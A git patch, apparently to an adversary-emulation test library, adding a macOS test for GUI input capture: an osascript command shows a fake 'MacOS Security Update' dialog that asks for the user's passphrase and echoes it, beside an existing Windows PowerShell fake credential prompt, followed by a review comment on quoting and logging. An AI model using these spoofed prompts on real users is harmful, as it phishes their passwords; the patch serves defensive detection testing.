From f0a2bac4632e2ba7120ae1b8ebfe2fddfa1757a0 Mon Sep 17 00:00:00 2001
From: Jonathan D <51128479+jonod8698@users.noreply.github.com>
Date: Sat, 16 Sep 2023 19:01:49 +1000
Subject: [PATCH] Add T1056.002 Gui Input Capture macOS test
---
 atomics/T1056.002/T1056.002.yaml | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/atomics/T1056.002/T1056.002.yaml b/atomics/T1056.002/T1056.002.yaml
index d65f56daa1..02ae6e8e0d 100644
--- a/atomics/T1056.002/T1056.002.yaml
+++ b/atomics/T1056.002/T1056.002.yaml
@@ -26,4 +26,15 @@ atomic_tests:
 $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
 # Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
 write-warning $cred.GetNetworkCredential().Password
- name: powershell
\ No newline at end of file
+ name: powershell
+- name: AppleScript - Spoofing a credential prompt using osascript
+ description: |
+ Prompt user for password without requiring permissions to send Apple events to System Settings.
+ https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
+ supported_platforms:
+ - macos
+ executor:
+ command: |
+ PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer') 
+ echo $PWD_SPOOF
+ name: bash
\ No newline at end of file
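Review bot: The unquoted `echo $PWD_SPOOF` in the new macOS executor word-splits and glob-expands whatever the victim typed, so a passphrase containing `*`, `?` or `[` can be replaced by matching filenames from the working directory and runs of spaces are collapsed; it should be `echo "$PWD_SPOOF"`. Note also that osascript returns the whole dialog record (`button returned:OK, text returned:<input>`) rather than the bare secret, and exits non-zero with nothing captured when the user clicks Cancel, which the command currently does not surface — a comment such as `# osascript prints "button returned:OK, text returned:<input>"; empty output means the user cancelled` would make the expected result clear to anyone reading the test log. The Windows test above carries a comment explaining why it prints the captured credential, and the macOS test would benefit from the same, since `echo` writes a real user password into Invoke-AtomicTest console output and logs. Finally, the hunk leaves the file without a trailing newline (`\ No newline at end of file` moves from the removed line to the added `name: bash`); adding one avoids the same noise in the next diff, and if this repository expects an `auto_generated_guid` on each test it is absent here, though that may be filled in by tooling.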